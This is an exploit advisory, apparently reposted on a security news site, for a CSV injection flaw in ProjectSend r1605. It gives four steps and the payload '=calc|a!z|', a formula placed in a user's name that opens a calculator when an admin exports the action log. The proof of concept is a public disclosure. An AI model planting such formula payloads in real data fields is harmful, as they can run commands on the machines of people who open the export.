Home Tools Exploits & CVE's projectSend r1605 CSV Injection

projectSend r1605 CSV Injection

June 16, 2023

288

projectSend version r1605 suffers from a CSV injection vulnerability.

Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs:  CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows


2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
step 3. Set name as  =calc|a!z|
step 3. If admin Export action-log as CSV  file ,in The computer of admin  occurs csv injection and will open calculator ( http://localhost/actions-log.php )

payload: =calc|a!z|

projectSend r1605 CSV Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

Chyrp 2.5.2 Cross Site Scripting

Apache mod_proxy_cluster Cross Site Scripting

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

OpenEMR 5.0.0 Remote Shell Upload

FLEX 1080/1085 Web 1.6.0 Information Disclosure

WordPress WPtouch 4.3.47 Open Redirection